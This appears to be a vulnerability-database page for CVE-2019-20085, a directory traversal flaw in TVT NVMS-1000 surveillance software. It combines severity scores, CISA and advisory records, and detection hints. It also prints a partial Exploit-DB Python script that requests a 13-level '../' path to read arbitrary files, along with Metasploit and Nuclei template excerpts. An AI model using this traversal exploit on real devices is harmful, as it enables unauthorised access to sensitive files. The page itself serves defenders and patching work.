CVE-2019-20085
published 2019-12-30CVE-2019-20085: TVT NVMS-1000 devices allow GET /.. Directory Traversal
PriorityP189high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
96.07%
99.9th percentile
TVT NVMS-1000 devices allow GET /.. Directory Traversal
Detection & IOCsextracted from sources · hover to see the quote
- →Detect directory traversal attempts by matching URL-encoded traversal sequences in GET requests targeting NVMS-1000 devices (port 80). Look for patterns like '..%2F' repeated in the request path. ↗
- →Also detect unencoded traversal sequences in GET requests: repeated '../' segments (13 levels deep) followed by a target filename path. ↗
- ·The vulnerability is unauthenticated and requires no prior access. The exploit targets NVMS-1000 version 3.4.1 specifically, but version information may not always be available for scoping detections. ↗
- ·This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active in-the-wild exploitation. Prioritize detection and patching accordingly. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck7.5HIGH
cisa7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
TVT NVMS-1000 Directory Traversal Vulnerability
cisa·2021-11-03·CVSS 7.5
CVE-2019-20085 [HIGH] CWE-22 TVT NVMS-1000 Directory Traversal Vulnerability
Vulnerability: TVT NVMS-1000 Directory Traversal Vulnerability
Affected: TVT NVMS-1000
TVT devices utilizing NVMS-1000 software contain a directory traversal vulnerability via GET /.. requests.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-20085
Remediation Due Date: 2022-05-03
GHSA
GHSA-6mf3-7mpr-9mgf: TVT NVMS-1000 devices allow GET /
ghsa_unreviewed·2022-05-24
CVE-2019-20085 [MEDIUM] CWE-22 GHSA-6mf3-7mpr-9mgf: TVT NVMS-1000 devices allow GET /
TVT NVMS-1000 devices allow GET /.. Directory Traversal
VulnCheck
TVT NVMS-1000 Directory Traversal Vulnerability
vulncheck·2019·CVSS 7.5
CVE-2019-20085 [HIGH] CWE-22 TVT NVMS-1000 Directory Traversal Vulnerability
TVT NVMS-1000 Directory Traversal Vulnerability
TVT devices utilizing NVMS-1000 software contain a directory traversal vulnerability via GET /.. requests.
Affected: TVT NVMS-1000
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Exploit PoC: https://vulncheck.com/xdb/7e163b7e9b71; https://vulncheck.com/xdb/48cf542ed3af; https://vulncheck.com/xdb/b69ae39519f9
Remediation Due: 2022-05-03
No detection rules found.
Exploit-DB
TVT NVMS 1000 - Directory Traversal
exploitdb·2020-04-13·CVSS 7.5
CVE-2019-20085 [HIGH] TVT NVMS 1000 - Directory Traversal
TVT NVMS 1000 - Directory Traversal
---
# Exploit Title: TVT NVMS 1000 - Directory Traversal
# Date: 2020-04-13
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
# Original Author : Numan Türle
# CVE : CVE-2019-20085
import sys
import requests
import os
import time
if len(sys.argv) !=4:
print " "
print "Usage : python exploit.py url filename outputname"
print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini"
print " "
else:
traversal = "../../../../../../../../../../../../../"
filename = sys.argv[2]
url = sys.argv[1]+traversal+filename
outputname = sys.argv[3]
content = requests.get(url)
if content.status_code == 200:
print " "
print "Directory T
Metasploit
TVT NVMS-1000 Directory Traversal
metasploit
TVT NVMS-1000 Directory Traversal
TVT NVMS-1000 Directory Traversal
This module exploits an unauthenticated directory traversal vulnerability which exists in TVT network surveillance management software-1000 version 3.4.1. NVMS listens by default on port 80.
Nuclei
TVT NVMS 1000 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2019-20085 [HIGH] TVT NVMS 1000 - Local File Inclusion
TVT NVMS 1000 - Local File Inclusion
TVT NVMS-1000 devices allow GET /.. local file inclusion attacks.
Template:
id: CVE-2019-20085
info:
name: TVT NVMS 1000 - Local File Inclusion
author: daffainfo
severity: high
description: |
TVT NVMS-1000 devices allow GET /.. local file inclusion attacks.
impact: |
An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the system.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the local file inclusion vulnerability in TVT NVMS 1000 software.
reference:
- https://www.exploit-db.com/exploits/48311
- https://www.exploit-db.com/exploits/47774
- http://packetstormsecurity.com/files/157196/TVT-NVMS-1000-Directory-Traversal.html
- https://nvd.nist.gov/vuln/detai
No writeups or analysis indexed.
http://packetstormsecurity.com/files/157196/TVT-NVMS-1000-Directory-Traversal.htmlhttps://www.exploit-db.com/exploits/47774http://packetstormsecurity.com/files/157196/TVT-NVMS-1000-Directory-Traversal.htmlhttps://www.exploit-db.com/exploits/47774https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-20085
2019-12-30
Published
2021-11-03
Added to CISA KEV
Exploited in the wild